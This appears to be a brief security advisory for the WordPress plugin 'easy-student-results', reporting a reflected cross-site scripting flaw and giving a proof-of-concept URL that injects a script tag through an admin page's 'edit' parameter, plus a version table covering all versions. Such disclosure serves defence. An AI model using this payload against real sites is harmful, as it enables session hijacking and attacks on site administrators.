The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=rps_result_batch&edit;=<script>alert(/XSS/)</script>
CPE | Name | Operator | Version |
---|---|---|---|
easy-student-results | eq | * |